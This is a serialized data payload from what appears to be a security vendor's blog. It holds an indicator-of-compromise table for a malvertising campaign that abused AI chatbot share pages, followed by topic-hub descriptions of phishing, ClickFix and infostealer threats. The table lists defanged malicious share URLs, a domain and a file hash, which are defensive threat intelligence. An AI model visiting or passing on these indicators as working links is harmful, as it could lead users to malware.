were:",{"data":4790,"content":4791,"nodeType":1427},{},[4792,4818,4841,4863,4886],{"data":4793,"content":4794,"nodeType":1431},{},[4795,4807],{"data":4796,"content":4797,"nodeType":4806},{},[4798],{"data":4799,"content":4800,"nodeType":455},{},[4801],{"data":4802,"marks":4803,"value":4805,"nodeType":448},{},[4804],{"type":452},"Indicator","table-header-cell",{"data":4808,"content":4809,"nodeType":4806},{},[4810],{"data":4811,"content":4812,"nodeType":455},{},[4813],{"data":4814,"marks":4815,"value":4817,"nodeType":448},{},[4816],{"type":452},"Type",{"data":4819,"content":4820,"nodeType":1431},{},[4821,4831],{"data":4822,"content":4823,"nodeType":1435},{},[4824],{"data":4825,"content":4826,"nodeType":455},{},[4827],{"data":4828,"marks":4829,"value":4830,"nodeType":448},{},[],"hxxps:\u002F\u002Fclaude[.]ai\u002Fshare\u002F8e6401b5-4849-46c4-a3cb-29e1c3c49131",{"data":4832,"content":4833,"nodeType":1435},{},[4834],{"data":4835,"content":4836,"nodeType":455},{},[4837],{"data":4838,"marks":4839,"value":4840,"nodeType":448},{},[],"URL",{"data":4842,"content":4843,"nodeType":1431},{},[4844,4854],{"data":4845,"content":4846,"nodeType":1435},{},[4847],{"data":4848,"content":4849,"nodeType":455},{},[4850],{"data":4851,"marks":4852,"value":4853,"nodeType":448},{},[],"hxxps:\u002F\u002Fchatgpt[.]com\u002Fs\u002Fcb_6a0f1e6bbec88191aa7fede27163f08d",{"data":4855,"content":4856,"nodeType":1435},{},[4857],{"data":4858,"content":4859,"nodeType":455},{},[4860],{"data":4861,"marks":4862,"value":4840,"nodeType":448},{},[],{"data":4864,"content":4865,"nodeType":1431},{},[4866,4876],{"data":4867,"content":4868,"nodeType":1435},{},[4869],{"data":4870,"content":4871,"nodeType":455},{},[4872],{"data":4873,"marks":4874,"value":4875,"nodeType":448},{},[],"openew[.]app",{"data":4877,"content":4878,"nodeType":1435},{},[4879],{"data":4880,"content":4881,"nodeType":455},{},[4882],{"data":4883,"marks":4884,"value":4885,"nodeType":448},{},[],"Domain",{"data":4887,"content":4888,"nodeType":1431},{},[4889,4899],{"data":4890,"content":4891,"nodeType":1435},{},[4892],{"data":4893,"content":4894,"nodeType":455},{},[4895],{"data":4896,"marks":4897,"value":4898,"nodeType":448},{},[],"de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",{"data":4900,"content":4901,"nodeType":1435},{},[4902],{"data":4903,"content":4904,"nodeType":455},{},[4905],{"data":4906,"marks":4907,"value":4908,"nodeType":448},{},[],"SHA256",{"data":4910,"content":4911,"nodeType":455},{},[4912],{"data":4913,"marks":4914,"value":21,"nodeType":448},{},[],"LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, sent via malvertising.","2026-05-29T00:00:00.000Z","llmshare-malvertising-campaign",{"items":4920},[4921,4923],{"sys":4922,"name":2803},{"id":2802},{"sys":4924,"name":2807},{"id":2806},{"items":4926},[4927],{"fullName":4928,"firstName":4929,"jobTitle":4930,"profilePicture":4931},"Keanu Maharaj","Keanu","Senior Security Researcher",{"url":4932},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FVCGOm62jiocjwngWTh32U\u002Fe9a30637b1c76bf988d2fec90f5b6c36\u002F1689361049351_1.png","the-state-of-clickfix-by-detection-data","blog\u002Fthe-state-of-clickfix-by-detection-data",{"json":4936},{"data":4937,"content":4938,"nodeType":440},{},[4939],{"data":4940,"content":4941,"nodeType":455},{},[4942],{"data":4943,"marks":4944,"value":4945,"nodeType":448},{},[],"ClickFix and derivative techniques now make up more than half of Push’s detections each month, with Attacker-in-the-Middle (AiTM) and device code phishing rounding out the top three. In this blog, we’re diving into our ClickFix data to give you the key trends and developments as we close out 2026. ","Diving into our ClickFix data to give you the key trends and developments as we close out 2026. ",{"id":4948,"publishedAt":4949},"3cLkjEBzRdI2CTq6oNohab","2026-09-23T12:31:46.924Z",{"items":4951},[4952],{"sys":4953,"name":2803},{"id":2802},{"items":4955},[4956,4960,4965,4970,4975,4980,4985,4990,4995,4999,5004],{"sys":4957,"name":1467,"slug":4959,"tier":45},{"id":4958},"topic-clickfix","clickfix",{"sys":4961,"name":4963,"slug":4964,"tier":31},{"id":4962},"topic-browser-attacks","Browser attacks","browser-attacks",{"sys":4966,"name":4968,"slug":4969,"tier":45},{"id":4967},"topic-malware-delivery","Malware delivery","malware-delivery",{"sys":4971,"name":4973,"slug":4974,"tier":45},{"id":4972},"topic-seo-poisoning","SEO poisoning","seo-poisoning",{"sys":4976,"name":4978,"slug":4979,"tier":45},{"id":4977},"topic-edr","EDR","edr",{"sys":4981,"name":4983,"slug":4984,"tier":45},{"id":4982},"topic-ai-attacks","AI attacks","ai-attacks",{"sys":4986,"name":4988,"slug":4989,"tier":45},{"id":4987},"topic-social-engineering","Social engineering","social-engineering",{"sys":4991,"name":4993,"slug":4994,"tier":45},{"id":4992},"topic-infostealer","Infostealer","infostealer",{"sys":4996,"name":305,"slug":4998,"tier":45},{"id":4997},"topic-session-hijacking","session-hijacking",{"sys":5000,"name":5002,"slug":5003,"tier":45},{"id":5001},"topic-malvertising","Malvertising","malvertising",{"sys":5005,"name":5007,"slug":5008,"tier":31},{"id":5006},"topic-threat-landscape","Threat landscape","threat-landscape","dOBAi-W3lgPtj6A0I8FyopfqREHorWq0OYmhhmebwWI",{"id":5011,"extension":1914,"items":5012,"meta":5400,"stem":5401,"__hash__":5402},"blogTopics\u002Fblogtopics.json",[5013,5022,5028,5037,5046,5055,5061,5070,5079,5088,5094,5103,5111,5119,5128,5135,5144,5150,5159,5167,5176,5185,5191,5200,5206,5211,5220,5229,5238,5247,5256,5265,5273,5281,5290,5299,5308,5316,5321,5327,5336,5345,5353,5359,5367,5376,5385,5391],{"sys":5014,"faqItemsCollection":5016,"name":5018,"slug":5019,"tier":31,"intro":5020,"faqTitle":60,"postCount":5021,"hasPage":19},{"id":5015},"topic-ai",{"items":5017},[],"AI","ai","AI is reshaping both sides of the security equation: employees adopt AI tools faster than security teams can track them, while attackers use AI to scale and automate campaigns. Shadow AI adoption may now outpace wider shadow SaaS, and attackers are already turning AI chatbot platforms into malware delivery channels. Push has researched the offensive potential of computer-using agents and now applies AI agents to its own threat hunting. This hub covers AI as risk, target, and defensive tool.",22,{"sys":5023,"faqItemsCollection":5024,"name":4983,"slug":4984,"tier":45,"intro":5026,"faqTitle":60,"postCount":5027,"hasPage":19},{"id":4982},{"items":5025},[],"AI attacks run in both directions: attackers using AI to scale phishing, malware delivery, and identity attacks, and AI platforms themselves becoming the attack surface. Push has researched how computer-using agents can automate identity attacks, and has seen the poisoned tenant technique it coined used against its own employees in the wild.",24,{"sys":5029,"faqItemsCollection":5031,"name":5033,"slug":5034,"tier":45,"intro":5035,"faqTitle":60,"postCount":5036,"hasPage":19},{"id":5030},"topic-ai-governance",{"items":5032},[],"AI governance","ai-governance","AI governance is how organizations set and enforce rules for workplace AI use — which tools are allowed, what data can enter them, and how to evidence it to regulators. With US, EU, and UK AI regulations converging on obligations most organizations can’t yet meet, Push’s research makes the case that enforcement starts in the browser, where AI tools are actually used.",9,{"sys":5038,"faqItemsCollection":5040,"name":5042,"slug":5043,"tier":45,"intro":5044,"faqTitle":60,"postCount":5045,"hasPage":19},{"id":5039},"topic-aitm",{"items":5041},[],"AiTM phishing","aitm","Adversary-in-the-middle (AiTM) phishing proxies a real login page through an attacker-controlled site, capturing credentials, MFA codes, and session tokens in real time to bypass multi-factor authentication. Push’s research into kits like Evilginx and Sneaky2FA documents how they evade URL- and signature-based detection — and why analyzing toolkit behavior in the browser catches attacks that blocklists miss.",78,{"sys":5047,"faqItemsCollection":5049,"name":5051,"slug":5052,"tier":45,"intro":5053,"faqTitle":60,"postCount":5054,"hasPage":6},{"id":5048},"topic-bec",{"items":5050},[],"BEC","bec","Business email compromise (BEC) turns a hijacked mailbox into a fraud tool: attackers use mail rules, auto-forwarding, and payment redirection to steal money while staying invisible to the account owner. Alongside a first-hand case study of a BEC attack that nearly cost an engineering firm millions, Push breaks down these mailbox persistence tricks and how to detect them.",4,{"sys":5056,"faqItemsCollection":5057,"name":4963,"slug":4964,"tier":31,"intro":5059,"faqTitle":60,"postCount":5060,"hasPage":19},{"id":4962},{"items":5058},[],"Browser attacks target users through the web pages, sessions, and extensions they rely on every day — bypassing endpoint and network defenses that never see inside the browser. Techniques like AiTM phishing kits, ClickFix-style copy-paste attacks, OAuth consent abuse, malvertising, and browser sync abuse have become a leading path to account takeover. Push researchers analyze these attacks in the wild, from infiltrating criminal phishing panels to dissecting toolkits like ConsentFix and Sneaky2FA. Use this hub to track how the techniques evolve and how to defend against them.",123,{"sys":5062,"faqItemsCollection":5064,"name":5066,"slug":5067,"tier":45,"intro":5068,"faqTitle":60,"postCount":5069,"hasPage":19},{"id":5063},"topic-browser-extensions",{"items":5065},[],"Browser extensions","browser-extensions","Browser extensions cut both ways for security teams: malicious or compromised extensions are a growing attack vector, while an extension is also the lightest-weight way to deploy security controls into the browsers employees already use. These posts cover both sides — extension-borne risks like browser sync attacks and the limits of risk scoring, and how Push uses its extension to detect threats and block risky extensions.",31,{"sys":5071,"faqItemsCollection":5073,"name":5075,"slug":5076,"tier":31,"intro":5077,"faqTitle":60,"postCount":5078,"hasPage":19},{"id":5072},"topic-browser-security",{"items":5074},[],"Browser security","browser-security","Work now happens in the browser, making browser security — visibility and control at the point where users meet the web — a core layer of enterprise defense. Endpoint, network, and email tools miss attacks that unfold inside the browser session, from AiTM phishing to risky extensions and shadow SaaS. Push has published extensively on choosing between enterprise browsers and browser extensions, using browser telemetry, and making the business case for browser security. Start here for both strategy and hands-on guidance.",129,{"sys":5080,"faqItemsCollection":5082,"name":5084,"slug":5085,"tier":45,"intro":5086,"faqTitle":60,"postCount":5087,"hasPage":19},{"id":5081},"topic-casb",{"items":5083},[],"CASB","casb","Cloud access security brokers (CASBs) govern cloud app usage through API integrations and network proxies — an approach that works for sanctioned apps but struggles with the long tail of shadow SaaS employees adopt on their own. Because every SaaS signup happens in a browser, Push captures that adoption in real time at the point of login, and these posts cover what proxy-based discovery misses.",12,{"sys":5089,"faqItemsCollection":5090,"name":1467,"slug":4959,"tier":45,"intro":5092,"faqTitle":60,"postCount":5093,"hasPage":19},{"id":4958},{"items":5091},[],"ClickFix attacks trick users into copying and running malicious commands themselves — typically through fake CAPTCHA, error, or fix-it prompts — so malware executes without a download for security tools to scan. Push researchers track the technique’s evolution in the wild and identified the ConsentFix and InstallFix variants, which extend it to OAuth consent grants and fake install guides.",41,{"sys":5095,"faqItemsCollection":5097,"name":5099,"slug":5100,"tier":45,"intro":5101,"faqTitle":60,"postCount":5102,"hasPage":19},{"id":5096},"topic-credential-phishing",{"items":5098},[],"Credential phishing","credential-phishing","Credential phishing steals usernames and passwords through fake login pages impersonating the services employees use, handing attackers direct access to corporate accounts. Attackers don’t hack in — they log in. Push’s browser extension analyzes login pages as users actually see them, blocking cloned pages and stopping employees from entering company passwords on lookalike sites.",90,{"sys":5104,"faqItemsCollection":5106,"name":300,"slug":5108,"tier":45,"intro":5109,"faqTitle":60,"postCount":5110,"hasPage":19},{"id":5105},"topic-credential-stuffing",{"items":5107},[],"credential-stuffing","Credential stuffing is an attack where criminals replay username-password pairs stolen from one breach against other services, exploiting password reuse to take over accounts. Major breaches have shown how far a single set of stolen credentials can travel. Push detects verified stolen credentials by comparing employee passwords against breach datasets and dark-web threat intelligence, eliminating false positives.",64,{"sys":5112,"faqItemsCollection":5114,"name":2807,"slug":5116,"tier":31,"intro":5117,"faqTitle":60,"postCount":5118,"hasPage":19},{"id":5113},"topic-detection-and-response",{"items":5115},[],"detection-and-response","Detection and response is being reshaped as attacks move into the browser, where EDR, SIEM, and network tools have limited visibility. Modern phishing kits evade signature-based detection, and most malicious pages have never been seen before — so technique-level, in-browser detection matters more than known-bad indicators. Push’s work here spans high-fidelity browser telemetry, session token theft detection, and agentic threat hunting, plus practical IR guidance for compromised SaaS accounts and malicious OAuth apps. These posts cover both the philosophy and the workflows.",102,{"sys":5120,"faqItemsCollection":5122,"name":5124,"slug":5125,"tier":45,"intro":5126,"faqTitle":60,"postCount":5127,"hasPage":19},{"id":5121},"topic-detection-engineering",{"items":5123},[],"Detection engineering","detection-engineering","Detection engineering turns threat research into reliable, high-fidelity detections — and as AI accelerates the churn of attacker infrastructure, indicator-based detection is collapsing in favor of technique-level approaches. Here you’ll find teardowns of AiTM kits, ClickFix pages, and malvertising campaigns, alongside Push’s own account of building an agentic threat hunting pipeline that turns hunts into shipped detections.",43,{"sys":5129,"faqItemsCollection":5131,"name":261,"slug":5133,"tier":45,"intro":5134,"faqTitle":60,"postCount":5027,"hasPage":19},{"id":5130},"topic-device-code-phishing",{"items":5132},[],"device-code-phishing","Device code phishing abuses the OAuth device authorization flow: attackers generate a legitimate sign-in code, trick the victim into entering it on the vendor’s real login page, and walk away with access tokens — no fake site or password capture required. Push research tracked a sharp spike in adoption during 2026 as attackers use the technique to sidestep standard access controls.",{"sys":5136,"faqItemsCollection":5138,"name":5140,"slug":5141,"tier":45,"intro":5142,"faqTitle":60,"postCount":5143,"hasPage":19},{"id":5137},"topic-dlp",{"items":5139},[],"DLP","dlp","Data loss prevention (DLP) is the practice of stopping sensitive data from leaving your control — a problem that has shifted from email and endpoints to the browser, where employees move data into SaaS and AI tools. Push applies controls at that point of use, from keeping corporate credentials out of personal password managers to governing what flows into unsanctioned apps.",15,{"sys":5145,"faqItemsCollection":5146,"name":4978,"slug":4979,"tier":45,"intro":5148,"faqTitle":60,"postCount":5149,"hasPage":19},{"id":4977},{"items":5147},[],"Endpoint detection and response (EDR) watches processes, files, and memory on the device — a vantage point that never sees the phishing pages, stolen sessions, and identity attacks playing out inside the browser. That’s not an EDR failure; attackers have simply moved where it can’t follow. These posts map that gap and show how Push pairs browser-level detection and response with endpoint security to close it.",26,{"sys":5151,"faqItemsCollection":5153,"name":5155,"slug":5156,"tier":45,"intro":5157,"faqTitle":60,"postCount":5158,"hasPage":19},{"id":5152},"topic-enterprise-browser",{"items":5154},[],"Enterprise browser","enterprise-browser","An enterprise browser is a standalone, security-hardened browser that organizations deploy in place of Chrome, Edge, or other defaults. The real buying question is whether replacing the browser beats securing the browsers employees already use — a trade-off these posts examine directly, alongside analysis of Omdia’s secure enterprise browser market report and Push’s framework for weighing full browsers against extension-based deployment.",8,{"sys":5160,"faqItemsCollection":5162,"name":290,"slug":5164,"tier":45,"intro":5165,"faqTitle":60,"postCount":5166,"hasPage":19},{"id":5161},"topic-ghost-logins",{"items":5163},[],"ghost-logins","Ghost logins are overlooked authentication routes into an account — like a password login lingering behind SSO, or a forgotten secondary auth method — that attackers exploit for account takeover and persistence. Push coined the term after research showing how these forgotten login paths let attackers sidestep the MFA and SSO controls guarding an account’s primary sign-in method.",48,{"sys":5168,"faqItemsCollection":5170,"name":5172,"slug":5173,"tier":45,"intro":5174,"faqTitle":60,"postCount":5175,"hasPage":19},{"id":5169},"topic-identity-attacks",{"items":5171},[],"Identity attacks","identity-attacks","Identity attacks target user accounts rather than infrastructure — phishing credentials, stealing sessions, abusing OAuth grants — because logging in is easier than hacking in. Identity-based techniques are now the leading cause of breaches. Push’s offensive research maps these techniques continuously, coining attacks like SAMLjacking and the poisoned tenant before they appeared in the wild.",58,{"sys":5177,"faqItemsCollection":5179,"name":5181,"slug":5182,"tier":31,"intro":5183,"faqTitle":60,"postCount":5184,"hasPage":19},{"id":5178},"topic-identity-security",{"items":5180},[],"Identity security","identity-security","Identity security is the practice of protecting workforce accounts, credentials, and sessions — the primary route attackers now use to breach organizations. Instead of hacking in, attackers log in: through phished credentials, stolen session tokens, MFA bypass, and forgotten ghost logins. Push’s research team documents these techniques continuously, from cross-IdP impersonation and SAMLjacking to analyses of major identity-driven breaches. This hub collects that research alongside practical guidance on MFA, SSO, and stopping account takeover.",154,{"sys":5186,"faqItemsCollection":5187,"name":4993,"slug":4994,"tier":45,"intro":5189,"faqTitle":60,"postCount":5190,"hasPage":19},{"id":4992},{"items":5188},[],"Infostealers are malware built to harvest saved passwords, cookies, and session tokens from infected devices, supplying the stolen credentials behind some of the most consequential breaches of recent years. Push traces the ecosystem trading this data and checks employee passwords against threat intel feeds, flagging verified stolen credentials before attackers can log in with them.",54,{"sys":5192,"faqItemsCollection":5194,"name":5196,"slug":5197,"tier":45,"intro":5198,"faqTitle":60,"postCount":5199,"hasPage":19},{"id":5193},"topic-legitimate-service-abuse",{"items":5195},[],"Legitimate service abuse","legitimate-service-abuse","Legitimate service abuse means staging attacks on trusted platforms — Google Ads, AI chatbot share pages, office.com links, Slack, SaaS tenants — so malicious content inherits the reputation of the service hosting it. Push research has documented the pattern repeatedly, from malvertising run through hijacked Google Ad Manager accounts to phishing links generated by Active Directory Federation Services.",29,{"sys":5201,"faqItemsCollection":5202,"name":5002,"slug":5003,"tier":45,"intro":5204,"faqTitle":60,"postCount":5205,"hasPage":19},{"id":5001},{"items":5203},[],"Malvertising uses paid search and display ads to put phishing pages and malware in front of users, often by impersonating trusted brands at the top of Google results. Push tracks these campaigns continuously — intercepting live attacks spoofing well-known brands — and has documented how criminals hijack Google Ads accounts to fund and run them.",32,{"sys":5207,"faqItemsCollection":5208,"name":4968,"slug":4969,"tier":45,"intro":5210,"faqTitle":60,"postCount":5143,"hasPage":19},{"id":4967},{"items":5209},[],"Malware delivery has moved into the browser: rather than email attachments, attackers now rely on malvertising, fake install guides, and ClickFix-style copy-paste lures to get code running on endpoints. Push research on techniques like InstallFix maps the playbook, and in-browser detection of malicious copy and paste blocks these attacks before commands reach the endpoint.",{"sys":5212,"faqItemsCollection":5214,"name":5216,"slug":5217,"tier":45,"intro":5218,"faqTitle":60,"postCount":5219,"hasPage":19},{"id":5213},"topic-mfa",{"items":5215},[],"MFA","mfa","Multi-factor authentication (MFA) requires a second proof of identity beyond a password, and it remains one of the most effective controls against account takeover. Regulators from Cyber Essentials to NYDFS now mandate it across cloud services. Push enforces MFA in the browser on third-party apps — even those with no native enforcement option — and shows security teams where coverage gaps remain.",83,{"sys":5221,"faqItemsCollection":5223,"name":5225,"slug":5226,"tier":45,"intro":5227,"faqTitle":60,"postCount":5228,"hasPage":19},{"id":5222},"topic-mfa-bypass",{"items":5224},[],"MFA bypass","mfa-bypass","MFA bypass covers the techniques attackers use to defeat multi-factor authentication — AiTM phishing kits, consent phishing, device code phishing, and MFA downgrade attacks among them. None of these break the second factor; they route around it. Push researchers regularly get hands-on with phishing kits like Evilginx and Sneaky2FA, analyzing how these attacks work in the wild and how they evolve.",60,{"sys":5230,"faqItemsCollection":5232,"name":5234,"slug":5235,"tier":45,"intro":5236,"faqTitle":60,"postCount":5237,"hasPage":19},{"id":5231},"topic-non-email-phishing",{"items":5233},[],"Non-email phishing","non-email-phishing","Non-email phishing delivers malicious links through channels your secure email gateway never sees — social media messages, IM apps like Slack and Teams, search ads, and SMS. Push has intercepted live campaigns arriving via LinkedIn DMs, malvertising, and messaging platforms, which is why it detects phishing pages in the browser at the point of click, regardless of delivery channel.",52,{"sys":5239,"faqItemsCollection":5241,"name":5243,"slug":5244,"tier":45,"intro":5245,"faqTitle":60,"postCount":5246,"hasPage":19},{"id":5240},"topic-oauth-abuse",{"items":5242},[],"OAuth abuse","oauth-abuse","OAuth abuse is attackers exploiting app-to-app authorization — consent phishing, malicious OAuth apps, stolen tokens, and device code flows — to gain persistent access to cloud tenants without touching a password or MFA prompt. Push tracks these techniques continuously and discovered ConsentFix, a browser-native attack in the wild that pairs OAuth consent phishing with a ClickFix-style prompt.",70,{"sys":5248,"faqItemsCollection":5250,"name":5252,"slug":5253,"tier":45,"intro":5254,"faqTitle":60,"postCount":5255,"hasPage":19},{"id":5249},"topic-passkeys",{"items":5251},[],"Passkeys","passkeys","Passkeys are phishing-resistant credentials that replace passwords with cryptographic key pairs bound to a user’s device. They defeat conventional credential phishing, but attackers adapt: Push research has documented MFA downgrade, app-specific password phishing, and device code phishing being used in the wild to route around passkey-protected accounts. Deploying passkeys is step one; closing those fallback paths is step two.",23,{"sys":5257,"faqItemsCollection":5259,"name":5261,"slug":5262,"tier":45,"intro":5263,"faqTitle":60,"postCount":5264,"hasPage":19},{"id":5258},"topic-password-security",{"items":5260},[],"Password security","password-security","Password security is the practice of keeping workforce credentials strong, unique, and out of attackers’ hands — still a frontline defense while most SaaS logins depend on passwords. Expiration policies don’t fix weak or reused passwords; visibility does. Push observes real logins in the browser to flag weak, reused, and breached passwords and guide employees to reset them on any app.",80,{"sys":5266,"faqItemsCollection":5268,"name":5270,"slug":5271,"tier":45,"intro":5272,"faqTitle":60,"postCount":5093,"hasPage":19},{"id":5267},"topic-phaas",{"items":5269},[],"PhaaS","phaas","Phishing-as-a-service (PhaaS) platforms sell ready-made phishing kits, hosted infrastructure, and management panels on subscription, letting low-skill criminals run MFA-bypassing campaigns at scale. Kits like Evilginx, Tycoon2FA, Sneaky2FA, FlowerStorm, and EvilTokens each add their own evasion and session-theft capabilities, and new entrants appear regularly. Push researchers continuously get hands-on with these tools — investigating attacks in the wild, reverse-engineering kit behavior, and turning that research into detections.",{"sys":5274,"faqItemsCollection":5276,"name":246,"slug":5278,"tier":31,"intro":5279,"faqTitle":60,"postCount":5280,"hasPage":19},{"id":5275},"topic-phishing",{"items":5277},[],"phishing","Phishing remains the most common way attackers compromise business accounts — and it has moved far beyond suspicious emails. Modern campaigns use AiTM toolkits that bypass MFA, consent phishing against OAuth, device code phishing, and lures delivered through malvertising, LinkedIn, and Slack. Push detects and blocks these attacks in the browser, and its researchers publish teardowns of live campaigns and kits like Evilginx and Sneaky2FA. Read on for how phishing actually works today and what stops it.",93,{"sys":5282,"faqItemsCollection":5284,"name":5286,"slug":5287,"tier":45,"intro":5288,"faqTitle":60,"postCount":5289,"hasPage":19},{"id":5283},"topic-public-breach",{"items":5285},[],"Public breach","public-breach","Public breaches are the disclosed incidents that show how attacks actually unfold once the headlines fade. Push’s breach analyses keep finding identity at the entry point: stolen credentials, OAuth abuse, and missing MFA recur across the incidents analyzed here.",30,{"sys":5291,"faqItemsCollection":5293,"name":5295,"slug":5296,"tier":45,"intro":5297,"faqTitle":60,"postCount":5298,"hasPage":19},{"id":5292},"topic-ransomware",{"items":5294},[],"Ransomware","ransomware","Ransomware attacks increasingly begin with an identity, not an exploit: stolen credentials, MFA bypass, and help desk scams give operators their initial foothold. The analysis here follows that front end of the kill chain — how identity compromise leads to ransomware deployment, and the breaches driving regulators toward tighter MFA requirements.",14,{"sys":5300,"faqItemsCollection":5302,"name":5304,"slug":5305,"tier":31,"intro":5306,"faqTitle":60,"postCount":5307,"hasPage":19},{"id":5301},"topic-saas-security",{"items":5303},[],"SaaS security","saas-security","SaaS security means protecting the sprawl of cloud apps, accounts, and integrations your employees adopt — often without IT ever knowing. Shadow SaaS, risky OAuth grants, ghost logins, and unmanaged third-party access create attack paths traditional controls can’t see, as recent high-profile breaches have demonstrated. Building on the original SaaS attack matrix, Push continues to map SaaS-native attack techniques alongside practical guides for discovering and securing unsanctioned apps, and this hub gathers all of it.",97,{"sys":5309,"faqItemsCollection":5311,"name":5313,"slug":5314,"tier":45,"intro":5315,"faqTitle":60,"postCount":5054,"hasPage":6},{"id":5310},"topic-security-training",{"items":5312},[],"Security training","security-training","Security training aims to teach employees to recognize and avoid attacks — yet modern phishing routinely fools even seasoned security professionals. Push argues that training budgets work harder as real-time, in-browser intervention: guardrails and warnings at the moment of risk, rather than lessons employees must recall under pressure.",{"sys":5317,"faqItemsCollection":5318,"name":4973,"slug":4974,"tier":45,"intro":5320,"faqTitle":60,"postCount":5158,"hasPage":19},{"id":4972},{"items":5319},[],"SEO poisoning manipulates search engine results so malicious pages rank prominently for the software, tools, or services users are actively searching for, turning a routine search into an infection vector. It often pairs with malvertising and ClickFix-style payloads — Push has documented attackers abusing shared pages on legitimate AI chatbot domains to deliver malware from trusted infrastructure.",{"sys":5322,"faqItemsCollection":5323,"name":305,"slug":4998,"tier":45,"intro":5325,"faqTitle":60,"postCount":5326,"hasPage":19},{"id":4997},{"items":5324},[],"Session hijacking is the theft of an authenticated session — usually via stolen session cookies or tokens — letting attackers walk past passwords and MFA into a live account. AiTM phishing kits and infostealers have made it a mainstream attack technique across both criminal and targeted intrusions. Push’s browser agent detects session token theft by adding telemetry to the user agent string, creating a high-fidelity signal for security teams.",76,{"sys":5328,"faqItemsCollection":5330,"name":5332,"slug":5333,"tier":45,"intro":5334,"faqTitle":60,"postCount":5335,"hasPage":19},{"id":5329},"topic-shadow-ai",{"items":5331},[],"Shadow AI","shadow-ai","Shadow AI is employees’ unsanctioned use of AI tools at work, putting corporate data into chatbots and assistants that security teams never approved and can’t see. Push’s own browser telemetry shows AI adoption acting as a force multiplier for shadow IT — potentially now outscaling shadow SaaS — and this hub tracks that research, real-world breach examples, and practical controls.",20,{"sys":5337,"faqItemsCollection":5339,"name":5341,"slug":5342,"tier":45,"intro":5343,"faqTitle":60,"postCount":5344,"hasPage":19},{"id":5338},"topic-shadow-saas",{"items":5340},[],"Shadow SaaS","shadow-saas","Shadow SaaS is the cloud applications employees adopt for work without IT approval, each one creating unmanaged accounts, identities, and data outside your security controls. Push covers the problem end to end — from browser-based SaaS discovery to in-browser app banners and MFA enforcement — alongside breach analyses that show where unmanaged accounts lead.",75,{"sys":5346,"faqItemsCollection":5348,"name":5350,"slug":5351,"tier":45,"intro":5352,"faqTitle":60,"postCount":5335,"hasPage":19},{"id":5347},"topic-siem",{"items":5349},[],"SIEM","siem","A SIEM is only as good as the telemetry feeding it, and most log sources never see what happens inside the browser — where phishing, session token theft, and account takeover actually play out. Push streams browser-level detections and identity telemetry into SIEMs, and these posts show how that data improves detection fidelity and cuts alert fatigue.",{"sys":5354,"faqItemsCollection":5355,"name":4988,"slug":4989,"tier":45,"intro":5357,"faqTitle":60,"postCount":5358,"hasPage":19},{"id":4987},{"items":5356},[],"Social engineering is the manipulation of people — through phishing pages, help desk impersonation, vishing calls, and poisoned tenant invites — into handing over access that no exploit could take. Coverage here tracks how threat actors run these plays — drawing on Push’s ongoing investigation of live phishing infrastructure and criminal tooling.",61,{"sys":5360,"faqItemsCollection":5362,"name":5364,"slug":5365,"tier":31,"intro":5366,"faqTitle":60,"postCount":5054,"hasPage":6},{"id":5361},"topic-supply-chain-security",{"items":5363},[],"Supply chain security","supply-chain-security","Supply chain security extends beyond your own perimeter to the vendors, platforms, and browser extensions your organization depends on. A compromised third party can hand attackers legitimate access — as recent campaigns against SaaS providers have shown. Push’s research examines the browser-extension supply chain in particular: why extension risk scores fail to predict compromise, and how developers can harden extensions against takeover. These posts frame supply chain risk through a browser and identity lens.",{"sys":5368,"faqItemsCollection":5370,"name":5372,"slug":5373,"tier":45,"intro":5374,"faqTitle":60,"postCount":5375,"hasPage":19},{"id":5369},"topic-swg",{"items":5371},[],"SWG","swg","A secure web gateway (SWG) filters and inspects web traffic in transit, sitting in the network path between users and the internet. That position shows you the packet but not the session: Push’s research on AitM phishing kits documents how attackers break the signatures proxies rely on, and these posts explain why phishing detection is moving from the network path into the browser itself.",18,{"sys":5377,"faqItemsCollection":5379,"name":5381,"slug":5382,"tier":45,"intro":5383,"faqTitle":60,"postCount":5384,"hasPage":19},{"id":5378},"topic-third-party-risk",{"items":5380},[],"Third-party risk","third-party-risk","Third-party risk is the exposure your organization inherits from vendors, SaaS providers, and integrations that hold your data or access your tenants — a chain now extended one employee sign-up at a time. This hub collects Push’s breach analyses and guides for assessing OAuth integrations, managing browser extensions, and responding when a supplier is compromised.",44,{"sys":5386,"faqItemsCollection":5387,"name":5007,"slug":5008,"tier":31,"intro":5389,"faqTitle":60,"postCount":5390,"hasPage":19},{"id":5006},{"items":5388},[],"The enterprise threat landscape is now defined by identity attacks: criminals log in with phished, stolen, or stuffed credentials rather than breaking infrastructure. Threat actors keep proving how effective help desk scams, MFA bypass, and session theft are against well-defended organizations. Drawing on breach analyses, annual phishing trend reviews, and in-the-wild campaign tracking, Push documents how attacker TTPs are shifting. This hub is where to follow those changes.",50,{"sys":5392,"faqItemsCollection":5394,"name":5396,"slug":5397,"tier":45,"intro":5398,"faqTitle":60,"postCount":5399,"hasPage":19},{"id":5393},"topic-vishing",{"items":5395},[],"Vishing","vishing","Vishing — voice phishing — uses phone calls to impersonate IT support, help desks, or employees, talking targets into password resets, MFA approvals, or opening attacker-controlled pages. Threat actors now routinely pair calls with AiTM phishing to hijack SSO accounts, a chain Push has analyzed across campaigns targeting hundreds of organizations.",16,{},"blogtopics","BD7BZLPNuV7dF-MISy_nsbm12QcOLMARqfPGsPRv82Y",1790174740317]